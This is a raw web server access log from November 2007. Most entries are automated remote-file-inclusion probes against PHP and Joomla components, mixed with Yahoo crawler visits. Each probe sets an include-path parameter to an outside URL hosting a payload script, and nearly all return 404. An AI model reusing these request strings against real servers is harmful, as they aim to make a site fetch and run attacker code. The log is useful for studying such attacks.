69.57.142.34 - - [25/Nov/2007:19:32:02 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.templodoconhecimento.com/portal/modules/smartpartner/include/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.151.33 - - [25/Nov/2007:19:32:41 -0800] "GET /logs/access_071008.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.38.76 - - [25/Nov/2007:19:35:00 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.38.76 - - [25/Nov/2007:19:35:00 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.104 - - [25/Nov/2007:19:36:55 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.8.104 - - [25/Nov/2007:19:36:56 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:19:39:37 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:37 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.northshoreclassifieds.com/chat/chat/localization/spanish/vhost/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:37 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:38 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:38 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://ofla.bravehost.com/b/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:38 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:38 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/korax/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:38 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:39 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:41 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.northshoreclassifieds.com/chat/chat/localization/spanish/vhost/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:44 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:46 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:49 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://ofla.bravehost.com/b/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:51 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:54 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/korax/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.96.218 - - [25/Nov/2007:19:39:56 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
74.6.8.104 - - [25/Nov/2007:19:43:23 -0800] "GET /logs/access_070702.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.34.252.133 - - [25/Nov/2007:19:45:31 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.34.252.133 - - [25/Nov/2007:19:45:31 -0800] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.8.104 - - [25/Nov/2007:19:45:32 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.30.214.232 - - [25/Nov/2007:19:46:03 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.34.252.133 - - [25/Nov/2007:19:48:28 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://baraozinhu.x-br.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.34.252.133 - - [25/Nov/2007:19:48:29 -0800] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://baraozinhu.x-br.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.18.38.76 - - [25/Nov/2007:19:50:42 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.38.76 - - [25/Nov/2007:19:50:42 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.19.235 - - [25/Nov/2007:19:52:17 -0800] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:19:54:24 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:19:54:24 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:19:54:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.6.24.152 - - [25/Nov/2007:19:54:37 -0800] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:19:54:42 -0800] "GET /logs/access_071001.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.179.217 - - [25/Nov/2007:19:55:36 -0800] "GET /logs/access_070528.log HTTP/1.0" 200 253171 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.213.73.15 - - [25/Nov/2007:19:57:53 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.213.73.15 - - [25/Nov/2007:19:57:53 -0800] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.213.73.15 - - [25/Nov/2007:19:59:39 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
62.213.73.15 - - [25/Nov/2007:19:59:40 -0800] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
74.6.7.113 - - [25/Nov/2007:20:03:17 -0800] "GET /logs/access_071008.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:20:11:55 -0800] "GET /logs/access_070604.log/default.php?pag=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:20:11:55 -0800] "GET /logs/access_070604.log/default.php?pag=http://www.northshoreclassifieds.com/chat/chat/localization/spanish/vhost/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:20:11:56 -0800] "GET /logs/access_070604.log/default.php?pag=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:20:11:56 -0800] "GET /logs/access_070604.log/default.php?pag=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:20:11:56 -0800] "GET /logs/access_070604.log/default.php?pag=http://ofla.bravehost.com/b/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:20:11:56 -0800] "GET /logs/access_070604.log/default.php?pag=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:20:11:56 -0800] "GET /logs/access_070604.log/default.php?pag=http://h1.ripway.com/korax/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.96.218 - - [25/Nov/2007:20:11:56 -0800] "GET /logs/access_070604.log/default.php?pag=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.19.168 - - [25/Nov/2007:20:13:51 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
72.30.215.99 - - [25/Nov/2007:20:13:51 -0800] "GET /logs/access_070409.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
68.180.250.109 - - [25/Nov/2007:20:14:38 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.213.73.15 - - [25/Nov/2007:20:15:36 -0800] "GET /logs/access_070903.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.200.204.130 - - [25/Nov/2007:20:17:04 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.204.130 - - [25/Nov/2007:20:17:04 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.38.76 - - [25/Nov/2007:20:17:41 -0800] "GET /logs/access_071015.log//login.php?dir=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.18.38.76 - - [25/Nov/2007:20:17:41 -0800] "GET //login.php?dir=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.38.76 - - [25/Nov/2007:20:17:41 -0800] "GET /logs//login.php?dir=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.213.73.15 - - [25/Nov/2007:20:18:46 -0800] "GET /logs/access_071022.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.213.73.15 - - [25/Nov/2007:20:19:32 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.8.104 - - [25/Nov/2007:20:20:06 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.8.104 - - [25/Nov/2007:20:23:50 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 1114112 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.18.38.76 - - [25/Nov/2007:20:24:55 -0800] "GET /logs/access_071001.log//login.php?dir=http://www.mtcarmel-umc.org/photos/albums/images/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
160.75.69.1 - - [25/Nov/2007:20:27:40 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
160.75.69.1 - - [25/Nov/2007:20:27:41 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
160.75.69.1 - - [25/Nov/2007:20:27:41 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [25/Nov/2007:20:27:42 -0800] "GET /logs/access_070716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.180.250.121 - - [25/Nov/2007:20:31:39 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.28.115 - - [25/Nov/2007:20:35:47 -0800] "GET /logs/access_070826.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
91.121.1.54 - - [25/Nov/2007:20:37:14 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://90plan.ovh.net/~movieweb//pafiledb/includes/template.php.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
91.121.1.54 - - [25/Nov/2007:20:37:15 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://90plan.ovh.net/~movieweb//pafiledb/includes/template.php.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
70.87.198.10 - - [25/Nov/2007:20:41:37 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.altersrente.de/banner/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.198.10 - - [25/Nov/2007:20:41:37 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.altersrente.de/banner/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.216.100 - - [25/Nov/2007:20:43:33 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:20:44:57 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.207.133.147 - - [25/Nov/2007:20:46:31 -0800] "GET /logs/access_070826.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://77.90.4.28/safeon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.133.147 - - [25/Nov/2007:20:46:31 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://77.90.4.28/safeon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.133.147 - - [25/Nov/2007:20:46:31 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://77.90.4.28/safeon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.133.147 - - [25/Nov/2007:20:46:31 -0800] "GET /logs/access_070730.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://77.90.4.28/safeon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.69.210 - - [25/Nov/2007:20:48:16 -0800] "GET /logs/index.php?go=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.210 - - [25/Nov/2007:20:48:16 -0800] "GET /index.php?go=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.207.133.147 - - [25/Nov/2007:20:48:48 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://77.90.4.28/safeon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.200.204.130 - - [25/Nov/2007:20:49:46 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.204.130 - - [25/Nov/2007:20:49:46 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.200.204.130 - - [25/Nov/2007:20:49:47 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.200.204.130 - - [25/Nov/2007:20:49:47 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
83.170.96.181 - - [25/Nov/2007:20:51:22 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.altersrente.de/banner/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.249.135.17 - - [25/Nov/2007:20:51:31 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
38.99.13.122 - - [25/Nov/2007:20:52:59 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "galf.org"
74.200.204.130 - - [25/Nov/2007:20:57:08 -0800] "GET /logs/send_reminders.php?includedir=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.200.204.130 - - [25/Nov/2007:20:57:09 -0800] "GET /send_reminders.php?includedir=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.200.204.130 - - [25/Nov/2007:20:57:09 -0800] "GET /logs/send_reminders.php?includedir=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.200.204.130 - - [25/Nov/2007:20:57:09 -0800] "GET /send_reminders.php?includedir=http://shopzama.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.101 - - [25/Nov/2007:20:58:34 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.34.252.133 - - [25/Nov/2007:20:58:57 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.34.252.133 - - [25/Nov/2007:20:58:57 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.34.252.133 - - [25/Nov/2007:20:59:58 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://baraozinhu.x-br.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.34.252.133 - - [25/Nov/2007:20:59:58 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://baraozinhu.x-br.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.170.96.181 - - [25/Nov/2007:21:01:28 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.altersrente.de/banner/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.96.181 - - [25/Nov/2007:21:01:29 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.altersrente.de/banner/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.96.181 - - [25/Nov/2007:21:01:29 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.altersrente.de/banner/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.96.181 - - [25/Nov/2007:21:01:29 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.altersrente.de/banner/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.170.96.181 - - [25/Nov/2007:21:01:30 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.altersrente.de/banner/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.96.181 - - [25/Nov/2007:21:01:30 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.altersrente.de/banner/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.103.128.44 - - [25/Nov/2007:21:02:55 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.103.128.44 - - [25/Nov/2007:21:02:55 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.111 - - [25/Nov/2007:21:04:26 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
83.170.96.181 - - [25/Nov/2007:21:04:45 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.altersrente.de/banner/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.96.181 - - [25/Nov/2007:21:04:45 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.altersrente.de/banner/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
